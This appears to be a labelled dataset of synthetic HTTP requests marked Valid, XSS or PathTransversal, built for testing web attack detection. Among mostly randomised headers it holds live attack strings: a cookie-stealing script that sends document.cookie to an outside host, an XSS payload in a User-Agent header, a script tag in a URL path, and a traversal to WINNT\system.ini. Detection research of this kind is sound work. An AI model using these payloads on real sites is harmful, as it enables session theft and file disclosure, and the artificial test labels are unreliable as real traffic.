Authorization: Basic c1Noc2VzYnA6ZXNzYmRp
Range: 41-,-67213
Referer: http://www.7Sle7ra.org/pdbgaee.php4
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: lgdo9e/2.6.4.2
UA-CPU: Sparc
UA-Disp: 894,918,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5910x691
Via: HTTP/2.2 87.55.198.69
Transfer-Encoding: compress
Upgrade: t6asre/5.0, ixhee/8.0
Warning: 223 241.60.75.35 "5tsnebAiy" 
X-Forwarded-For: 171.141.7.56
X-Serial-Number: 9909201039312
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 20100
Start - Id: 46726
class: XSS
GET /gMo71iKKjR8FCc6hFDBQ/e@dMgN_h@1OghNMkLlzs/.nullCwO/VC1bNNwdformm/opxonreP/50hoeeBrsbrt3anme/dT-cd@hrOhVbnu7_Ndy/iTYSrH35/usb1dhiap1iTtmyr4/NsHLq@a6m/vntr4oSwe2cnda/ns@p.bin?ieBp=58&rEutlrd=esshalerf5ctos&lcabgUa7gz2=orsaimTasgr&2kmLY-Kg=%29hrar&eJleCvlmu2pxQ=IS&htIgi2s=8ZTj9n&06tntaoEUrie=8gfatdfgsbes0d&cserhUHerue6ix=rx5&nloeG=miq43sLsnode&mtr=lGnpFAP&hlscwiN=64909&LCesey9o=rm1&anlnerCN=5&Rno=rtr&s7heoicaaaoyto=0 HTTP/1.0
Host: www.nMihle.gov:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: 1eaicwar-eti;q=0.4
Cache-Control: no-store
Client-ip: 91.101.32.104
Cookie: 3fcet=qoi4;Xphp5VicatvKM=930400647;cllhycrn=<a  href   = "   about:<s&#99;ript >[document.location.replace('http://www.or.com/cgi-bin/iltanest.cgi'+document.cookie);]</script >     "  >
Cookie2: $Version="4"
Date: Sat, 11 Sep 04 17:46:36 CET
ETag: "yCU6lB0dTv41IMWuqIc8"
Expect: 100-continue
From: mxoee2@lBEae77d.it
If-Modified-Since: Mon, 03 Jul 06 05:58:44 UTC
If-Unmodified-Since: Sat, 07 Jan 06 06:33:40 GMT
If-Match: "7d6UwzCgZqVpGM@l"
If-None-Match: *
If-Range: Fri, 08 Sep 06 08:07:04 CET
Max-Forwards: 8597
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: yaje qine=rs3s
Authorization: NTLM aHBqbGxuQ3RtY2V0TmJ1c3RkZWFodHpjYm5UYWRlZ3pvZThWYWh4b2xzaQ==
Range: 33-010
Referer: http://rnazZed.org/wnon/hseeonl/3tn0czan/iU6s8t2n/s6qzrA.pl
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: fvXnhiGy http://www.attl1o.biz
UA-CPU: 68000
UA-Disp: 257,623,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 0307x779
Via: 9.0 www.CydrelSy.html, HTTP/2.1 61.196.249.206, HTTP/3.1 162.98.168.96:0945
Transfer-Encoding: gzip
Upgrade: ar7fy/8.9, amv/7.8
Warning: 482 www.rd3c.png "onQyhRm" 
X-Forwarded-For: 101.237.144.23
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 46726
Start - Id: 8272
class: Valid
GET /hbL4ha_sV1eAmVaa/H4GHvwmg9/thS4mnt70s/lpR21Rr_fy_.x/ehOetdrcEmhstt1hrNf/bVEKQWg22ySZ81/eGIzsAatfCvXmBpwaapP/eM84hFO/o4h5nteOmngraiTs1/iredn5.css?gpdl=b1c7Taopen+e2rmhC%7E%3DxFvr&EnJEUnsluonr=7r&hnscriptJgfDoptDandH=9936035 HTTP/1.1
Host: 240.154.107.171
Connection: close
Accept: video/mpeg, image/*;q=0.9, application/*;q=0.1
Accept-Charset: hz-gb-2312;q=0.0, big5, iso-8859-2;q=0.2, windows-874, shift_jis;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 42.18.246.120
Cookie: S3ywtIogteqn=ee8tjii2we;iOddivEF=larYhae5nauqeimtto
Cookie2: $Version="95"
Date: Thu, 15 Mar 07 15:33:33 CET
ETag: ".Xq_e.D36F0CLCo9e"
Expect: 100-continue
From: teSs@0iptauimo.cz
If-Modified-Since: Mon, 19 Apr 04 03:43:05 GMT
If-Unmodified-Since: Tue, 02 Aug 05 17:14:08 UTC
If-Match: "9vqsV@CzYPHFnDM6"
If-None-Match: *
If-Range: *
Max-Forwards: 827
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: l6sult ptotur=gueoiO
Authorization: NTLM YnB5bm9vbWxvcnJlaHN4bzlnc2Nkbjdlc2kwZndhamFiNHBwcW1MZFVwdWNB
Range: -9
Referer: /jOtsomr/uhosiea.exe
TE: gzip
Trailer: Authorization
User-Agent: 7uJtmaeo/2.5.8
UA-CPU: Sparc
UA-Disp: 260,910,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 833x678
Via: 8.9 www.sseniFg.jpeg, FTP/0.9 www.nrd0r.htm
Transfer-Encoding: gzip
Upgrade: n83/8.7, wpeioz/2.0, Rbtic5/8.3, s4h/9.8
Warning: 511 www.4eiedl.jpg "iyeseuen99unse7mytth" 
X-Forwarded-For: 180.145.13.167
X-Serial-Number: 07344757970707367
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 8272
Start - Id: 21862
class: Valid
GET /flJI/we0hnoh8/4YOfhnHl.png?ssnuo=538735&5enlSyc=nfromlibd&4ltnte6itSSjoon=dmbm&exnsz=kFL7IkTZb6&iHt5eStporey=tU5JnBb6PI&DdatLor7tlv=R2spositionT9r4eoi&aa66c=193&emnomvrfmvaqsEr=e7giOQ&uq=395061900&iowr2er=37&t0ilw4rrukcbba=+Wi6Ev&4pahtspo=a+yexecu%7Cch2elink%25 HTTP/1.0
Host: www.yhlsedt.it:5
Connection: oDil
Accept: application/*;q=0.2, audio/x-wav;q=0.5, audio/*;q=0.2
Accept-Charset: windows-1250;q=0.9, us-ascii;q=0.5, iso-8859-5;q=0.0
Accept-Encoding: gzip, gzip;q=0.9, identity, identity, identity;q=0.5
Accept-Language: e-iTratYd;q=0.4, mz9D69i-cnade;q=0.2, emfse-rtepet;q=0.6, gsna7iln-csxOm
Cache-Control: no-cache
Client-ip: 127.36.79.82
Cookie: BtmpSs=+texecbeETwri330s
Cookie2: $Version="1"
Date: Sat, 05 Nov 05 06:47:34 GMT
ETag: "_oWm6wFQ0bxMU5_"
Expect: 100-continue
From: iese@tecT.fr
If-Modified-Since: Wed, 11 May 05 20:18:08 GMT
If-Unmodified-Since: Thu, 10 Nov 05 05:03:05 UTC
If-Match: "ohEfqe7f0NNc39s3ufV"
If-None-Match: *
If-Range: Tue, 14 Nov 06 07:32:44 CET
Max-Forwards: 9434
MIME-Version: 8.9
Pragma: dneu=ter
Proxy-Authorization: Digest response="D5B0a7D66ce9CaDc9B7fbC4bBDdCb0cC"
Authorization: roifRm i3nte=9hwSafc
Range: 127-,459-41979
Referer: http://www.3unes.de/tuftghN/hReme2as/8iiha/rdqEq7t.swf
TE: trailers,chunked;q=0.9
Trailer: Connection
User-Agent: oESjvm-e http://www.fouhweq.net
UA-CPU: StrongARM
UA-Disp: 649,1976,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5382x0739
Via: 8.1 48.81.153.143, 9.1 www.msDt.css:5
Transfer-Encoding: gzip
Upgrade: ehlec4/7.5, etieo/5.3, 3cri9/3.1, neAm/6.9, neum/3.4
Warning: 312 www.ln8onMov.shtml "tEn0djA" 
X-Forwarded-For: 180.152.252.21
X-Serial-Number: 0932215457430057404
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 21862
Start - Id: 23344
class: Valid
GET /0TPuhX9o/xali/ad3F8-8wEFt0Z/N8@d.6Ly8.gfscriptB/aini7feehteTgwfaoin/imlaoswedeiishe9mk/eOzK/7fi1n/1EQA@ZQklOyJoE-/u3cs4uc/w.C-65SNh__7/nJSxBq.cfm?to=nm&oinbsPe=gymnptch1rNWtRenac&td0nNie0=eikCsnbetweenwindow.open8fgsamo&ixniIty1oS5eoe=Put1ootrer48sthm2p&wR_T=22&70na8terNhhaR=aORfqqKQ&nyseNFebn=7768440&Ztdpc44=BmwAeov&3HituefbomstO=626088259&eetdtrhe6eqc=tcopyu0xytL2execcaul&3hSO=%7Eyeirel&EnvChbh=5&mnnxel=sJYH1s0y4H&5TAeeeupQp=34306484 HTTP/1.1
Host: www.20o86.be
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: max-age=94
Client-ip: 253.173.161.120
Cookie: alhteett=Xb;l9dgootn=t;toebl=sEsjPhIp7.kC;eNkosmoron=i10MkQVjNkFL
Cookie2: $Version="209"
Date: Fri, 27 May 05 23:40:38 GMT
ETag: "eVACl-3mNGn-FXqEH"
Expect: 100-continue
From: eriitwao@Q9ma4lnlsr.net
If-Modified-Since: Thu, 05 Jan 06 17:35:57 UTC
If-Unmodified-Since: Thu, 18 Sep 08 13:19:39 UTC
If-Match: *
If-None-Match: "hxIuMsUbOsa@Epz"
If-Range: "5UQPb8QMjJgj67KpM"
Max-Forwards: 2247
MIME-Version: 3.5
Pragma: gl=th8t
Proxy-Authorization: Basic OW9lVHQ5OkNXOW9wcjZv
Authorization: lc4et y5attemj=ahaae
Range: 56-,3148-4773
Referer: http://www.2atltpn9.com/nsft7ua/haann.jpg
TE: chunked
Trailer: Warning
User-Agent: Mozilla/0.2 (Machintosh; U; PPC 2.2; ep-Eo; rv:4.0.6) Gecko/95420823
UA-CPU: Sparc
UA-Disp: 7895,7420,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 026x806
Via: FTP/0.3 198.87.5.17
Transfer-Encoding: gzip
Upgrade: rseahb/4.1
Warning: 710 www.qqnpuaYz.png "ihkehztphSeahn" "Mon, 08 Sep 08 04:21:24 UTC"
X-Forwarded-For: 143.52.19.171
X-Serial-Number: 0696294106219
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23344
Start - Id: 2720
class: Valid
GET /4xqOK@M1cr6L/a9DQKw97qzB/RLGXtzkXI/cHphKY_bgsoundFpGs-l5/bPOlh/esltge6nis1og/dMthiVX7HLqAP/8rhel/ra/tsyi7g4/Hnntcra.tiff?mipert=gopttptnyua&qtstahx0fiGtml=581216&1ewnAc3=e%3Fgs%3C&2aigt5tiihe=bodyDinorrm%2F-netcatobjectag7tt%3AN%29c&sndnyssAe3tiy=PpbtrRtyxl6fetffd&vlsdnemeaE=6315617973&e7rmrdg=2&hd=e98c%26h5b&uhl8twznxh=205&ecei=3qc.9zaW&tusut=rhUeRemp0esee HTTP/1.1
Host: www.sluwoE.biz
Connection: close
Accept: image/*;q=0.1
Accept-Charset: euc-tw, iso-8859-5, x-mac-ce;q=0.6, iso-8859-7;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 5.163.223.176
Cookie: boetsek=03;1hoasi=249194318;tatde0b1e=yclewuru8;redipebi0=6S_kW;xsruW=0156;aa5x7radnq=npNhlszhE' ehu ck
Cookie2: $Version="995"
Date: Wed, 06 Feb 08 23:44:10 UTC
ETag: W/"tl03X75yzzkyhRscYHqO"
Expect: 100-continue
From: elaee@z3vnA8l.ch
If-Modified-Since: Fri, 18 Apr 08 15:20:32 UTC
If-Unmodified-Since: Tue, 12 Aug 08 03:33:59 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: hnknte 6dhe=ailltedl
Authorization: Digest opaque="vctre"
Range: 800-526712,0803-
Referer: http://Esnxeee.be/stemyi/snMyrx/Teto.gif
TE: gzip;q=0.8,trailers,deflate;q=0.2
Trailer: If-Unmodified-Since
User-Agent: osetjHh2z http://www.57wecks.org
UA-CPU: 68000
UA-Disp: 991,432,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9002x158
Via: 7.0 www.oFamt.shtml:7, 8.6 94.71.115.185
Transfer-Encoding: gzip
Upgrade: ztd/6.6, uveUC/2.7, edns/8.2, 7mo/6.6
Warning: 722 219.161.37.147 "eueen5o9vYS" "Tue, 30 Aug 05 03:30:07 CET"
X-Forwarded-For: 185.239.118.59
X-Serial-Number: 053261538285243
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2720
Start - Id: 16192
class: Valid
GET /iVwujfwyFuYlzdC/2uernf1inoo1h.gif?uF2eqH8gait=%40rzdcsystemel+Efph&NtzhsOe7a=s&wsfeyOrot2Utn=Obm9edmnoeyueEi HTTP/1.1
Host: 98.135.160.35
Connection: keep-alive
Accept: image/png, audio/*;q=0.0, application/postscript
Accept-Charset: iso-10646-ucs-2, x-mac-korean;q=0.2, iso-8859-7, windows-1255;q=0.5, iso-8859-5;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: 7tcm=bh7paien
Client-ip: 198.192.178.105
Cookie: OQLM=im@Tgm;owueastoohir=if.Zf;ltittZaJiao=m2.OHKIoVIEn;cni=41409;eeeu=6;nsC=hui
Cookie2: $Version="7"
Date: Sun, 31 Aug 08 08:16:41 GMT
ETag: "GdpkdGTcDO4ooYNc83N"
Expect: ttov=si6g
From: oltae@ieknifNr4.org
If-Modified-Since: Tue, 20 Nov 07 15:46:54 UTC
If-Unmodified-Since: Sun, 18 Apr 04 01:02:45 GMT
If-Match: *
If-None-Match: "SdFR4yo3BnaJIKK"
If-Range: Sun, 09 Apr 06 08:38:12 UTC
Max-Forwards: 572
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic ZmVsenphaWE6M3dydDJx
Authorization: ztoo cieErAt=Iitna
Range: 635922-
Referer: http://tr0i.st/Hbaeos/naeatnp/ihoe0pul/eihemeEL/6yan.bin
TE: gzip;q=0.4
Trailer: Max-Forwards
User-Agent: OegT6oi9slsxNncuuep
UA-CPU: PowerPC
UA-Disp: 121,346,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 846x8936
Via: art05o/0.3 235.255.233.112
Transfer-Encoding: compress
Upgrade: rwde/3.6, attru/5.7
Warning: 949 www.enaabteO.htm "Ssb5d" "Sat, 19 Jun 04 06:56:30 CET"
X-Forwarded-For: 66.190.19.60
X-Serial-Number: 799166656602
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16192
Start - Id: 7205
class: Valid
POST /5ettOn/icn1ot/b2HJqnx0l_t.dll? HTTP/1.0
Content-Length: 73
Content-Language: id,lP3hlrd
Content-Encoding: gzip
Content-Location: http://www.ritZGiND.net/ensxmJk/gpiasOs/nNxhhale/or9Mhnb9.dll
Content-MD5: aGFlb2xwdGthcndlcmJjaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 23 Dec 06 12:07:46 UTC
Last-Modified: Sun, 25 Jul 04 01:38:57 CET
Host: 70.200.164.175:80
Connection: keep-alive
Accept: text/*
Accept-Charset: iso-2022-kr, ks_c_5601-1987, x-mac-chinesesimp;q=0.4
Accept-Encoding: compress, compress, gzip;q=0.0, deflate;q=0.9, identity
Accept-Language: ecr8eo-er, aecr-wslpms
Cache-Control: TCoht='0ynop'
Client-ip: 255.188.160.16
Cookie: eaja=sF.9Aeh2r9M;acceptgI3E3oMrcp=rr7eljcu8h
Cookie2: $Version="439"
Date: Fri, 22 Feb 08 06:21:54 CET
ETag: W/"rn6sybHKNVxYy6EGGhl"
Expect: 100-continue
From: eklcds@EusetgdssJ.biz
If-Modified-Since: Fri, 18 Nov 05 04:55:28 CET
If-Unmodified-Since: Sun, 07 Mar 10 17:21:51 UTC
If-Match: "FdcEzvVFTT6YEHVlbLR9"
If-None-Match: "0oRJZOwg46uSF4_tGm"
If-Range: "hyLM-f92oYh2LpZE8g9"
Max-Forwards: 6130
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Digest nc=9f15Ac7e
Authorization: NTLM MXNjaHV3aHk0bnJralNzb0FyNmtvU2dmeW53d3RodHJteXB1YW41YnNtcg==
Range: 835-,-3,7-0
Referer: http://www.do5ins.ch/axiniee.ace
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: eatsieoterntlmeahrs
UA-CPU: Sparc
UA-Disp: 5578,6674,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 629x010
Via: HTTP/9.8 www.lisxu80.shtml, uewc8/0.2 160.37.144.101, 2.7 www.finsaip.jpg
Transfer-Encoding: gzip
Upgrade: nctee/4.4, seyc/3.3, leTnv/8.7
Warning: 892 www.oeiareeu.shtml "skEl0E" "Sun, 11 Jul 04 16:54:27 UTC"
X-Forwarded-For: 62.39.133.239
X-Serial-Number: 741957676224840602
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

a2cnbsn1i2io=529&enuhearRcryitnt=62418757&ECPipUHUdm=57704285&1TuzmGB4=69

End - Id: 7205
Start - Id: 19739
class: Valid
GET /beS7bV_mEFtN19LPhTKY/FqtdaW/lpgnedhjhae9roSnoh/ebE.php4? HTTP/1.0
Host: www.nndat.it:5169
Connection: keep-alive
Accept: text/plain, text/*;q=0.3, video/*
Accept-Charset: us-ascii;q=0.7
Accept-Encoding: 
Accept-Language: lg-k2r, dh1er9G-vd;q=0.9, li-ePkaim;q=0.6, nE-vpav;q=0.6, tyAto-roan
Cache-Control: no-store
Client-ip: 207.179.57.163
Cookie: Nl0rouz6tadnmSe=lq7TFVF_4D-;optFl6QV9lFgak=like?nicmdo1;ets0=dyueweerIoehplrurt;uchaddedhttxq0x=2etfaOitrtx;baOn0tmaTrrrP1=d
Cookie2: $Version="14"
Date: Wed, 20 Aug 08 13:36:48 CET
ETag: "MpA374tHGJvwNKPP"
Expect: Ewse
From: iuIqi35@sebqclrtn.be
If-Modified-Since: Mon, 17 Oct 05 02:35:36 GMT
If-Unmodified-Since: Thu, 11 Feb 10 13:13:19 GMT
If-Match: "sp8U@MuChLi3ZmWy@6"
If-None-Match: *
If-Range: *
Max-Forwards: 064
MIME-Version: 8.6
Pragma: enhEY='edA8'
Proxy-Authorization: NTLM bHRIaXRocnN1YTZpczlEc2FpZWlhOW5hOXROdmNQb250cmhp
Authorization: Digest response="68eD7BCF057e10Ba9ACd98B34D385C49"
Range: 4774-
Referer: http://www.Ycaunih.com/dxh8nesb/ez7hsb.sh
TE: trailers,chunked,trailers
Trailer: Max-Forwards
User-Agent: axie/3.0
UA-CPU: PowerPC
UA-Disp: 666,3443,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8348x2037
Via: HTTP/7.5 www.aepnie.html, FTP/4.8 81.103.48.185, 7.5 203.119.106.210
Transfer-Encoding: tstpi1
Upgrade: no0E/0.8, 0wmAl/6.4, eee/7.7, 81t/9.2
Warning: 577 www.soDnr.shtml "epcbtilItta9ssLe" 
X-Forwarded-For: 43.198.16.171
X-Serial-Number: 465640999525707
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19739
Start - Id: 17232
class: Valid
GET /lebta7sitsf7/a1ygC3t5U37/9W5RSG7VR5R3_/oFofa/r7O3/trpsioSntrPNoerDcemh/YvbscriptX_bXvQIF/7TZYpGrDgA8HsUn24FD/buZ.y.mspx?eslnauloohgxty=aQ8i3ayu&dnGrU=0&u-Ey-D=65&reldrvcyrneig=gljsoqpoeac&iaid6i4dh=odd2yao9e%3C&tntaa=lincludeevp5dinputlretms&npjpYM=gtofhsmr%26irieu&sam@rcpHjvo=tYow3WklN&CK98c0divnbP=oeencd+mj&a9CRAQexecjbodyc5=130944284&BsystemX9pzF=11UNnx8&pqn9set=6291549192 HTTP/1.0
Host: www.utton.be:23353
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: windows-1251;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 20.173.15.57
Cookie: Hrdnea8so=n_UcQk2v9SCr;lttugeqx4wur=812;4logia=\r4;nph-ld;yN5frtiE=pht0svllssosock_streamho
Cookie2: $Version="300"
Date: Tue, 13 Jan 09 07:32:50 CET
ETag: W/"HnwxiVRWMiR4Y3gQ1sEO"
Expect: 100-continue
From: tytiiae@0oytu.it
If-Modified-Since: Mon, 20 Jun 05 05:34:11 CET
If-Unmodified-Since: Tue, 22 Sep 09 22:44:14 CET
If-Match: "cGjvZ8OKzglteZmq1"
If-None-Match: "XEdgohSq6jEPh2LF"
If-Range: Wed, 12 Dec 07 14:09:34 CET
Max-Forwards: 019
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM bmx0YTA2dGVkcDkwdHNzdG51ZHNoZTNuZG5obWJhYXJvcmRtZg==
Authorization: onFiie LiitXiee=8mHs
Range: 6-57857,13604-
Referer: http://7mEch.be/rcpksc0/znt4og/XtOrnh/uy9oMi.js
TE: chunked;q=0.4
Trailer: If-Modified-Since
User-Agent: Mozilla/1.6 (Machintosh; U; Mac OS X 3.8; es-tn; rv:5.7.9) Gecko/91206054
UA-CPU: StrongARM
UA-Disp: 121,6829,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4168x797
Via: tseo/8.9 www.xrtlnqO.tiff, Encw8/1.2 18.50.41.160, 8.7 242.27.40.76
Transfer-Encoding: gzip
Upgrade: e7eli/6.7, 5Tued/6.2
Warning: 190 www.aefddvq.jpeg "twaMeths2eixnld" "Thu, 30 Jul 09 01:31:53 GMT"
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 220039
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17232
Start - Id: 46575
class: XSS
GET /neodfS/afaorecat7ee/osV8S4stlM6aAi4nDtdV/ah/aDkvR7M.asp?gegstfigTn2hnn=361 HTTP/1.1
Host: 5.8.230.114:80
Connection: close
Accept: application/*, text/*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: heig6cu-nant;q=0.2, kSp-2oocesq, ssen-hekacd;q=0.3, rdosenem-Os;q=0.1, l-ner5zTqx
Cache-Control: no-store
Client-ip: 140.154.179.232
Cookie: asedevuourst=Eo;RtMeekK=po8urm6fiNacritt
Cookie2: $Version="0"
Date: Wed, 07 Apr 10 03:21:27 GMT
ETag: W/"j-GvuB-Y6UUJL8q3fp"
Expect: oai0tt
If-Modified-Since: Fri, 24 Apr 09 06:47:20 CET
If-Unmodified-Since: Sun, 27 Jul 08 02:57:14 CET
If-Match: *
If-None-Match: "hoxGwh6JrFrjyKG52"
If-Range: "kSAsVsy_9kJhV@IM3v"
Max-Forwards: 972
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM M2VhU3NBb25hOWZoZ2lub2NiZXQxUm50YXRzdHRUbm9lb3NtUm4=
Authorization: Digest realm
Range: 70-
Referer: http://eZgiu9mf.cz/io9j.pl
TE: deflate,trailers,trailers
Trailer: If-Match
User-Agent: <div style  =   "    behaviour:  url([http://www.onlalena.com/script/uOx.asp]);  "  >
UA-CPU: PowerPC
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5605x1554
Via: 4.7 www.duyh.css, 4.4 www.Zaclha.shtml, 2.4 www.famH.png:021
Transfer-Encoding: gzip
Upgrade: ieek/6.0, 9suhri/7.2, tEdUn/4.8, nen3O/8.2
Warning: 179 24.207.141.105:00 "tAos9srMecair0" 
X-Forwarded-For: 222.189.31.195
X-Serial-Number: 70953324571970
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46575
Start - Id: 46468
class: XSS
GET /<script>alert('Vulnerable')</script>.jsp? HTTP/1.0
Host: 70.194.185.161:66293
Connection: close
Accept: image/png;q=0.9, audio/*, application/*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Client-ip: 212.173.22.144
Cookie2: $Version="4"
Date: Mon, 20 Jun 05 16:36:01 CET
Pragma: tdol=pseqO
Proxy-Authorization: Digest cnonce="eAenecin"
Authorization: NTLM b3BpbWN0dDR0dW5pQ0kxaGllbmV0VW9vdGE4c1VubW4w
Referer: /roEurae/iedin.pl
User-Agent: caudMeeGllemegmndi
Transfer-Encoding: gzip

null

End - Id: 46468
Start - Id: 9652
class: Valid
GET /c8sldn/MknwbetweenJ8YnrU3/qP6dtaml2adhNeim.msf?horohoenr6=51931596&veIetE7qneep=lBbi4QyTjzMV&ki9Edlirtnhn=55361379&YsEPsnhE=228910&mz61UN=156557&ulUgMservicesqv=58&emetaWhomeMD1=350 HTTP/1.0
Host: 217.118.126.117:0
Connection: keep-alive
Accept: */*
Accept-Charset: euc-tw;q=0.5, utf-7;q=0.6, iso-8859-2;q=0.4
Accept-Encoding: gzip;q=0.1, identity;q=0.4
Accept-Language: auli-dohrdphu;q=0.7
Cache-Control: max-stale=12193
Client-ip: 22.60.12.210
Cookie: phpttbeie=6-7pwSM6cu0C;teDnnaau=tqer5nevalnhwn9k;t9p2etlceree2ni=rVgRP;enlips8dt4rolo=o>boot.initmpU;exboeOtawes=g;sef=30131
Cookie2: $Version="011"
Date: Fri, 10 Apr 09 20:10:58 CET
ETag: W/"mAp4wCl6gRr7GF74grcD"
Expect: 100-continue
From: ocaq@aau2fenea.fr
If-Modified-Since: Wed, 23 Apr 08 09:57:12 GMT
If-Unmodified-Since: Wed, 25 Aug 04 08:02:08 GMT
If-Match: "E3klDtMyNa_zm2TER4e4"
If-None-Match: *
If-Range: *
Max-Forwards: 465
MIME-Version: 3.3
Pragma: h7='a5oWg'
Proxy-Authorization: ni3esO o9oc=rheoabn
Authorization: Basic d3RudDpydTNjZTU=
Range: 54-7853,-953,87-
Referer: /biont.pl
TE: trailers,trailers,deflate
Trailer: Accept-Encoding
User-Agent: ah6all4ar1
UA-CPU: PowerPC
UA-Disp: 0833,784,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 7210x634
Via: 9.7 79.212.212.153:96866
Transfer-Encoding: gzip
Upgrade: sLskE/9.9, lm6o/6.1, toe1rq/3.0
Warning: 821 www.f4tipnoj.jpeg:21799 "pyfo4" 
X-Forwarded-For: 48.192.127.27
X-Serial-Number: 04486
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9652
Start - Id: 18872
class: Valid
GET /gaS2XWCVeDrHyYXf/e9PJ-COI1P7btWl/asaei/fq.asp?httpqWVbzSGD=cmdl&jRtrb8passwd=betweenfr+%3BRa-&rEaooothh=fGoYNX&tdh=8&wmmt=0&lrl5hD=rb&niHu2kt=tcxterm%5D&e4etb=rlni%25R&zmCnvCbH=854 HTTP/1.0
Host: 223.192.4.73
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=39549
Client-ip: 82.233.191.39
Cookie: fpt8im2EhHykea1=u;hrfie=33186
Cookie2: $Version="71"
Date: Mon, 20 Jul 09 01:41:21 CET
ETag: "J.W_Qe.k9SdYIbZT"
Expect: 100-continue
From: jontegt@8eoi1ys.fr
If-Modified-Since: Mon, 26 Feb 07 14:31:19 GMT
If-Unmodified-Since: Wed, 18 Mar 09 10:48:28 CET
If-Match: *
If-None-Match: "8Z-jDspHUE_lbk4rfIT"
If-Range: *
Max-Forwards: 4
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: NTLM b2hkbGxzN2lvUmNmQWFsM2VvYXdMbnJmQWltYWV0aGw=
Authorization: Basic b29ud2NkMTphdFRvaGE=
Range: 401413-5174
Referer: /ogist/puterE/gtfa/xAntCe/72d9.msf
TE: chunked;q=0.6,trailers
Trailer: Host
User-Agent: Mozilla/8.8 (X11; U; Linux i386 8.3; at-u3; rv:2.9.0) Gecko/95876662
UA-CPU: StrongARM
UA-Disp: 708,1125,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4447x587
Via: HTTP/1.7 70.86.150.13, HTTP/8.5 www.Aasdatac.tiff, 1.8 www.idtm.jpg
Transfer-Encoding: identity
Upgrade: ekNth/2.5, rgs/1.1, ob2/8.6, v8twea/4.7, 0smean/7.4
Warning: 951 www.irwnsd.tiff "9rmmauuilegoneDwol22" 
X-Forwarded-For: 56.146.49.3
X-Serial-Number: 7170824828
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18872
Start - Id: 45575
class: PathTransversal
GET /tyl0NtnqMEoAKg-l-DR.tiff?7brfirbLre=wdzimugtotiEhuosZp&dhuReeaP=beafEkw+din2%27&CaDE=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini HTTP/1.0
Host: 163.86.11.250
Connection: close
Accept: image/gif, application/postscript;q=0.2, image/*;q=0.9
Accept-Charset: iso-8859-5;q=0.8, x-mac-hebrew, big5, x-mac-cyrillic
Accept-Encoding: identity, identity;q=0.1
Accept-Language: *
Cache-Control: irauirtn=oea7e4vn
Client-ip: 80.183.70.158
Cookie: rnryest5s=c2(b$ tt ai0ai0ir O;luemoom4=Woetan
Cookie2: $Version="74"
Date: Sun, 24 Aug 08 05:28:46 GMT
ETag: "INZLiNJ9EJe5m7Nfb"
Expect: chatt5r=iate7c;ywiims=cuttsa
From: wtdlbok@elsFbheed.st
If-Modified-Since: Wed, 01 Dec 04 20:22:48 UTC
If-Unmodified-Since: Wed, 13 Oct 04 09:03:55 CET
If-Match: "HqkqudUaIFSb7GNLNvjo"
If-None-Match: *
